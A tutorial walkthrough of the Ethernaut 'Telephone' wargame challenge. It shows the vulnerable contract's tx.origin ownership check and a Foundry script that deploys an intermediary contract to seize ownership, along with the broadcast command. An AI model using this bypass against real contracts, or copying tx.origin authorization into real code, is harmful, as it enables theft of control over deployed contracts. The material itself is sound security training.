Ethernaut 4 Telephone Foundry Solution?—?2023?Tutorial

In this tutorial, we will be solving the “Ethernaut 4— Telephone” challenge with Foundry. I’ll guide you through the entire process.

In case you prefer a video tutorial? I’ve got you covered!

Prerequisites

Before we begin, make sure you’ve completed the following prerequisites:

1. Watch the first video in this series on how to start with Ethernaut and set up your Foundry local environment for solving challenges:

1. Clone the Ethernaut Foundry Solutions Repository (don’t forget to leave a star on Github ??)
2. Subscribe to the JohnnyTime YouTube channel for more tutorials and updates, and check the full Ethernaut Foundry Solutions playlist.
3. Want to make out of Smart Contract Hacking into a career? Check out the full Smart Contract Hacking Course.

Understanding the Challenge

In the Telephone smart contract, our goal is to claim ownership in the Telephone contract!

Telephone.sol Smart?Contract

First we will copy the smart contract to our local Foundry environment:

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract Telephone {

  address public owner;

  constructor() {
    owner = msg.sender;
  }

  function changeOwner(address _owner) public {
    if (tx.origin != msg.sender) {
      owner = _owner;
    }
  }
}        

1. It has an “owner” variable, initially set to the address that deploys the contract (not us ??).
2. The “changeOwner” function lets you update the owner’s address, but only if the original sender (tx.origin) of the transaction is not the same as the current sender (msg.sender), which means?—?a smart contract.

The difference between msg.sender to tx.origin

To solve the challenge we first need to understand the difference between tx.origin and msg.sender and how we can make sure they are different.

1. tx.origin is the original sender of a transaction, which is always an EOA (Externally Owned Account) and can never be a smart contract. It represents the external Ethereum account that initiated the transaction. It remains the same throughout the entire transaction chain, even if a contract calls another contract.
2. msg.sender is the sender of the current transaction within a contract. It can change when one contract interacts with another, as it reflects the address of the contract that initiated the most recent call.

To make tx.origin and msg.sender different, you can create a contract that acts as an intermediary. When this contract calls another contract, msg.sender in the called contract will be the intermediary contract’s address, while tx.origin remains the original sender’s address.

If you’re eager to delve deeper into the world of smart contract security and Ethereum Virtual Machine (EVM) concepts and want to elevate your smart contract security skills, the practical smart contract hacking course is the perfect choice for you.

Telephone Solution

To solve this challenge with Foudnry, we will create inside the script\ folder a new file TelephoneSolution.s.sol, and paste the code:

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import "../src/Telephone.sol";
import "forge-std/Script.sol";
import "forge-std/console.sol";

contract IntermidiaryContract {
    constructor(Telephone _telephone, address _newOwner) {
        _telephone.changeOwner(_newOwner);
    }
}

contract TelephoneSolution is Script {

    Telephone public telephoneInstance = Telephone(0x1d2d01Db7aAe83081BDfff7844C8030f2d51a5AB);

    function run() external {
        vm.startBroadcast(vm.envUint("PRIVATE_KEY"));
        new IntermidiaryContract(
            telephoneInstance, vm.envAddress("MY_ADDRESS")
        );
        vm.stopBroadcast();
    }
}        

1. It will generate and deploy a new contract called IntermediaryContract
2. It will provide this new contract with both the original “Telephone” smart contract instance and our player’s Ethereum address.
3. IntermediaryContract will invoke the changeOwner function and pass our player EOA account as the parameter. Since it’s a contract making this call and not an externally owned account (EOA), msg.sender and tx.origin will differ.
4. The “require” statement will be satisfied, enabling the owner to be changed to our player’s account.

Now that the script is ready, we can execute from our terminal the following command:

forge script script/TelephoneSolution.s.sol --broadcast        

Now, after our transaction was submitted and main on the Goerli blockchain, we can go to the ethernaut challenge page and click “Submit Instance”:

And congratulation! You completed the 4th Ethernaut challenge ??

Don’t Forget

1. Follow me on Medium for more awesome articles and tutorials.
2. Subscribe to the JohnnyTime YouTube channel for more tutorials and updates, and check the full Ethernaut Foundry Solutions playlist.
3. Become a Certified Smart Contract Hacker

See you in the next tutorial! ??